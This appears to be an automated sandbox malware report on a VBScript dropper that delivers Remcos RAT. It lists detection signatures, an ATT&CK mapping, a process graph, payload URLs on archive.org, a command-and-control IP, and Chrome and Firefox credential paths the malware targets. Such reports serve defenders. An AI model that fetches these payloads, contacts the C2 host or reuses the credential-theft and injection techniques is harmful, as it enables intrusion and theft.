                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0044154E _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected Remcos RATShow sources
                Source: Yara matchFile source: 00000010.00000002.595080191.0000000000E68000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6984, type: MEMORY
                Source: Yara matchFile source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Contains functionality to steal Chrome passwords or cookiesShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                Contains functionality to steal Firefox passwords or cookiesShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \key3.db

                Remote Access Functionality:

                barindex
                Detected Remcos RATShow sources
                Source: aspnet_compiler.exeString found in binary or memory: Remcos_Mutex_Inj
                Source: aspnet_compiler.exe, 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.4 Prov|
                Yara detected Remcos RATShow sources
                Source: Yara matchFile source: 00000010.00000002.595080191.0000000000E68000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6984, type: MEMORY
                Source: Yara matchFile source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: cmd.exe

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScripting221Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information11OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                Default AccountsNative API1Windows Service1Access Token Manipulation1Scripting221Input Capture111Account Discovery1Remote Desktop ProtocolInput Capture111Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsCommand and Scripting Interpreter12Registry Run Keys / Startup Folder1Windows Service1Obfuscated Files or Information3Credentials In Files2System Service Discovery1SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsService Execution2Logon Script (Mac)Process Injection322Masquerading1NTDSFile and Directory Discovery3Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
                Cloud AccountsPowerShell1Network Logon ScriptRegistry Run Keys / Startup Folder1Virtualization/Sandbox Evasion31LSA SecretsSystem Information Discovery33SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsQuery Registry1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol12Jamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection322DCSyncSecurity Software Discovery31Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemVirtualization/Sandbox Evasion31Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowProcess Discovery3Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingApplication Window Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Owner/User Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingRemote System Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 394453 Sample: Appraisa.vbs Startdate: 21/04/2021 Architecture: WINDOWS Score: 100 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Detected Remcos RAT 2->46 48 5 other signatures 2->48 8 wscript.exe 1 2->8         started        process3 signatures4 58 VBScript performs obfuscated calls to suspicious functions 8->58 60 Wscript starts Powershell (via cmd or directly) 8->60 62 Obfuscated command line found 8->62 11 powershell.exe 14 23 8->11         started        process5 dnsIp6 32 ia601509.us.archive.org 207.241.227.119, 443, 49716 INTERNET-ARCHIVEUS United States 11->32 34 ia601401.us.archive.org 207.241.227.121, 443, 49727 INTERNET-ARCHIVEUS United States 11->34 36 ia801400.us.archive.org 207.241.228.140, 443, 49722 INTERNET-ARCHIVEUS United States 11->36 28 C:\Users\Public\ Microsoft.ps1, ASCII 11->28 dropped 64 Creates an undocumented autostart registry key 11->64 16 powershell.exe 23 11->16         started        19 conhost.exe 11->19         started        file7 signatures8 process9 signatures10 38 Writes to foreign memory regions 16->38 40 Injects a PE file into a foreign processes 16->40 21 aspnet_compiler.exe 2 2 16->21         started        process11 dnsIp12 30 194.5.97.183, 49734, 49736, 49739 DANILENKODE Netherlands 21->30 26 C:\Users\user\AppData\Roaming\...\logs.dat, data 21->26 dropped 50 Contains functionality to steal Chrome passwords or cookies 21->50 52 Contains functionality to inject code into remote processes 21->52 54 Contains functionality to steal Firefox passwords or cookies 21->54 56 2 other signatures 21->56 file13 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://ia601401.us.archive.orgx0%Avira URL Cloudsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                194.5.97.1830%VirustotalBrowse
                194.5.97.1830%Avira URL Cloudsafe
                https://contoso.com/0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                http://crl.micr0%URL Reputationsafe
                http://crl.micr0%URL Reputationsafe
                http://crl.micr0%URL Reputationsafe
                http://crl.micr0%URL Reputationsafe
                https://ia801400.us.arX0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                ia801400.us.archive.org
                207.241.228.140
                truefalse
                  high
                  ia601401.us.archive.org
                  207.241.227.121
                  truefalse
                    high
                    ia601509.us.archive.org
                    207.241.227.119
                    truefalse
                      high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      194.5.97.183true
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmpfalse
                        high
                        http://crl.godaddy.com/gdig2s1-1597.crl0powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpfalse
                          high
                          https://ia801400.us.archive.orgpowershell.exe, 00000001.00000002.603008008.000001E837A68000.00000004.00000001.sdmpfalse
                            high
                            https://ia601401.us.archive.orgpowershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpfalse
                              high
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmpfalse
                                high
                                http://certificates.godaddy.com/repository/0powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpfalse
                                  high
                                  https://go.micropowershell.exe, 00000001.00000002.604945687.000001E83814F000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT0ypowershell.exe, 00000001.00000002.601177058.000001E837087000.00000004.00000001.sdmpfalse
                                    high
                                    http://certs.godaddy.com/repository/1301powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpfalse
                                      high
                                      https://ia601401.us.archive.orgxpowershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://contoso.com/Licensepowershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://ia801400.us.archive.orgpowershell.exe, 00000001.00000002.604580136.000001E838036000.00000004.00000001.sdmpfalse
                                        high
                                        https://contoso.com/Iconpowershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://ia601401.us.archive.orgpowershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpfalse
                                          high
                                          https://ia801400.us.archive.org/0/items/bat02/bat02.txtpowershell.exe, 00000001.00000002.602933114.000001E837A11000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.604545038.000001E838006000.00000004.00000001.sdmpfalse
                                            high
                                            https://certs.godaddy.com/repository/0powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpfalse
                                              high
                                              https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmpfalse
                                                high
                                                https://ia601509.us.archive.orgpowershell.exe, 00000001.00000002.601177058.000001E837087000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://crl.godaddy.com/gdroot-g2.crl0Fpowershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://ia601401.us.archive.org/6/items/server_20210420_1438/Server.txtpowershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.602933114.000001E837A11000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.595371615.000001E834AF6000.00000004.00000020.sdmpfalse
                                                      high
                                                      https://contoso.com/powershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://crl.godaddy.com/gdroot.crl0Fpowershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://certificates.godaddy.com/repository/gdig2.crt0powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://crl.micrpowershell.exe, 0000000C.00000003.409245391.00000135614DD000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.596741320.000001E836671000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://ia801400.us.arXpowershell.exe, 00000001.00000002.604545038.000001E838006000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXTPowerShell_transcript.367706.fOfA42_i.20210421153634.txt.1.drfalse
                                                                high

                                                                Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                207.241.227.119
                                                                ia601509.us.archive.orgUnited States
                                                                7941INTERNET-ARCHIVEUSfalse
                                                                194.5.97.183
                                                                unknownNetherlands
                                                                208476DANILENKODEtrue
                                                                207.241.227.121
                                                                ia601401.us.archive.orgUnited States
                                                                7941INTERNET-ARCHIVEUSfalse
                                                                207.241.228.140
                                                                ia801400.us.archive.orgUnited States
                                                                7941INTERNET-ARCHIVEUSfalse

                                                                General Information

                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                Analysis ID:394453
                                                                Start date:21.04.2021
                                                                Start time:15:35:42
                                                                Joe Sandbox Product:CloudBasic
                                                                Overall analysis duration:0h 8m 18s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:light
                                                                Sample file name:Appraisa.vbs
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                Number of analysed new started processes analysed:28
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winVBS@8/11@3/4
                                                                EGA Information:Failed
                                                                HDC Information:
                                                                • Successful, ratio: 99% (good quality ratio 94.1%)
                                                                • Quality average: 83.2%
                                                                • Quality standard deviation: 26.6%
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 0
                                                                • Number of non-executed functions: 0
                                                                Cookbook Comments:
                                                                • Adjust boot time
                                                                • Enable AMSI
                                                                • Found application associated with file extension: .vbs
                                                                Warnings:
                                                                Show All
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                • TCP Packets have been reduced to 100
                                                                • Excluded IPs from analysis (whitelisted): 51.103.5.159, 168.61.161.212, 131.253.33.200, 13.107.22.200, 20.82.210.154, 40.88.32.150, 104.43.193.48, 92.122.145.220, 93.184.221.240, 13.88.21.125, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 184.30.24.56, 20.82.209.183
                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, cs11.wpc.v0cdn.net, audownload.windowsupdate.nsatc.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                15:36:35API Interceptor82x Sleep call for process: powershell.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                194.5.97.183Appraisal11002275444900.vbsGet hashmaliciousBrowse
                                                                  207.241.227.121SOA - NCL INTER LOGISTICS.pptGet hashmaliciousBrowse
                                                                    Payment Invoice##(6321210).vbsGet hashmaliciousBrowse
                                                                      207.241.228.140Appraisal11002275444900.vbsGet hashmaliciousBrowse
                                                                        invoice-order-21412-paypal.xlxs.vbsGet hashmaliciousBrowse
                                                                          Invoice-ID-(87656532).vbsGet hashmaliciousBrowse
                                                                            Statement-ID-(400603).vbsGet hashmaliciousBrowse
                                                                              order-invoice-amazon-#D01-9237793-8041853.DOCX.vbsGet hashmaliciousBrowse
                                                                                TK29.vbsGet hashmaliciousBrowse
                                                                                  NR52.vbsGet hashmaliciousBrowse
                                                                                    Purchase Order WT-7011 List.xlsGet hashmaliciousBrowse
                                                                                      New Purchase Order RFQ List - Copy.xlsGet hashmaliciousBrowse
                                                                                        Payment Advice PDF.pptGet hashmaliciousBrowse
                                                                                          New Orders PDF.ppsGet hashmaliciousBrowse
                                                                                            New Purchase Order.xlsGet hashmaliciousBrowse
                                                                                              Request for Quotation76584454.pptGet hashmaliciousBrowse

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                ia801400.us.archive.orgAppraisal11002275444900.vbsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                invoice-order-21412-paypal.xlxs.vbsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                Invoice-ID-(87656532).vbsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                Statement-ID-(400603).vbsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                order-invoice-amazon-#D01-9237793-8041853.DOCX.vbsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                TK29.vbsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                NR52.vbsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                Purchase Order WT-7011 List.xlsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                New Purchase Order RFQ List - Copy.xlsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                Payment Advice PDF.pptGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                New Orders PDF.ppsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                New Purchase Order.xlsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                Request for Quotation76584454.pptGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                ia601401.us.archive.orgDetails van vereiste.ppsGet hashmaliciousBrowse
                                                                                                • 207.241.227.121
                                                                                                Offerte aanvragen 22-02-2021.pptGet hashmaliciousBrowse
                                                                                                • 207.241.227.121
                                                                                                SOA - NCL INTER LOGISTICS.pptGet hashmaliciousBrowse
                                                                                                • 207.241.227.121
                                                                                                Payment Invoice##(6321210).vbsGet hashmaliciousBrowse
                                                                                                • 207.241.227.121

                                                                                                ASN

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                DANILENKODERemittanceAdvice_20210420_160446.jarGet hashmaliciousBrowse
                                                                                                • 194.5.97.160
                                                                                                Urgent RFQ_AP65425652_032421,pdf.exeGet hashmaliciousBrowse
                                                                                                • 194.5.97.16
                                                                                                QUOTATION.exeGet hashmaliciousBrowse
                                                                                                • 194.5.97.181
                                                                                                Appraisal11002275444900.vbsGet hashmaliciousBrowse
                                                                                                • 194.5.97.183
                                                                                                SCANCOPY-794673947.exeGet hashmaliciousBrowse
                                                                                                • 194.5.97.11
                                                                                                OC CVE6535 TVOP-MIO 16(C) 2021,pdf.exeGet hashmaliciousBrowse
                                                                                                • 194.5.97.16
                                                                                                Tax Invoices.exeGet hashmaliciousBrowse
                                                                                                • 194.5.98.97
                                                                                                SCAN_COPY-369326739.exeGet hashmaliciousBrowse
                                                                                                • 194.5.97.11
                                                                                                Urgente RFQ_AP65425652_032421,pdf.exeGet hashmaliciousBrowse
                                                                                                • 194.5.97.14
                                                                                                PAYMENT ADVICE.exeGet hashmaliciousBrowse
                                                                                                • 194.5.98.11
                                                                                                GT42536.scr.exeGet hashmaliciousBrowse
                                                                                                • 194.5.98.251
                                                                                                SCAN COPY2539976864PDF.exeGet hashmaliciousBrowse
                                                                                                • 194.5.97.11
                                                                                                Kemmler-New order requirement 90901U,pdf.exeGet hashmaliciousBrowse
                                                                                                • 194.5.97.14
                                                                                                SWIFTS.scr.exeGet hashmaliciousBrowse
                                                                                                • 194.5.98.184
                                                                                                9pZezwiVaz.exeGet hashmaliciousBrowse
                                                                                                • 194.5.97.116
                                                                                                AIC7VMxudf.exeGet hashmaliciousBrowse
                                                                                                • 194.5.98.250
                                                                                                n4CeZTejKM.exeGet hashmaliciousBrowse
                                                                                                • 194.5.98.9
                                                                                                New Order request Ref E100-#3175704534,pdf.e.exeGet hashmaliciousBrowse
                                                                                                • 194.5.97.14
                                                                                                PO-#3175704534,PDF.exeGet hashmaliciousBrowse
                                                                                                • 194.5.97.14
                                                                                                Evgp2DqQha.exeGet hashmaliciousBrowse
                                                                                                • 194.5.98.107
                                                                                                INTERNET-ARCHIVEUSAppraisal11002275444900.vbsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                invoice-order-21412-paypal.xlxs.vbsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                PO -28001 X67533AB.pptGet hashmaliciousBrowse
                                                                                                • 207.241.224.2
                                                                                                0901e76c84536f06b_2500332020005403099_0901e76c4489e546f06b_250020214405500030995.WsFGet hashmaliciousBrowse
                                                                                                • 207.241.224.2
                                                                                                RFQ P39948220.pptGet hashmaliciousBrowse
                                                                                                • 207.241.224.2
                                                                                                Order 100920-0087.ppsGet hashmaliciousBrowse
                                                                                                • 207.241.224.2
                                                                                                Confirm Order for AKTEK Company_E4117.pptGet hashmaliciousBrowse
                                                                                                • 207.241.228.148
                                                                                                Invoice-ID-(87656532).vbsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                Statement-ID-(400603).vbsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                order-invoice-amazon-#D01-9237793-8041853.DOCX.vbsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140
                                                                                                Invoice copyt2.ppsGet hashmaliciousBrowse
                                                                                                • 207.241.228.153
                                                                                                Invoice copy.pptGet hashmaliciousBrowse
                                                                                                • 207.241.228.153
                                                                                                Invoice copy.pptGet hashmaliciousBrowse
                                                                                                • 207.241.228.153
                                                                                                PO#070421APRIL-REV.pptGet hashmaliciousBrowse
                                                                                                • 207.241.228.148
                                                                                                NEW LEMA PO 652872-21.pptGet hashmaliciousBrowse
                                                                                                • 207.241.228.153
                                                                                                final po PP-11164.pptGet hashmaliciousBrowse
                                                                                                • 207.241.228.148
                                                                                                OrderSheet.ppsGet hashmaliciousBrowse
                                                                                                • 207.241.224.2
                                                                                                FK58.vbsGet hashmaliciousBrowse
                                                                                                • 207.241.228.150
                                                                                                spectrum-statement-bill-7214213.DOCX.vbsGet hashmaliciousBrowse
                                                                                                • 207.241.224.2
                                                                                                TK29.vbsGet hashmaliciousBrowse
                                                                                                • 207.241.228.140

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                54328bd36c14bd82ddaa0c04b25ed9adBank Details.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                Payment_Swift_0096986854748574.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                #U7f51#U901f#U79d1#U6280CDN#U52a0#U901f#U4ea7#U54c1#U6587#U6863 .exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                Sales_Receipt_4423_052720.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                4600004505.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                6xrXVxpiSm.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                zj4NVQ6TKa.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                VZshmdIfmC.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                7wiTGdPpvv.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                7Wv8cQT117.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                SecuriteInfo.com.Variant.Bulz.440290.18036.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
                                                                                                • 207.241.228.140
                                                                                                SecuriteInfo.com.Trojan.GenericKD.36741716.4036.exeGet hashmaliciousBrowse
                                                                                                • 207.241.227.119
                                                                                                • 207.241.227.121
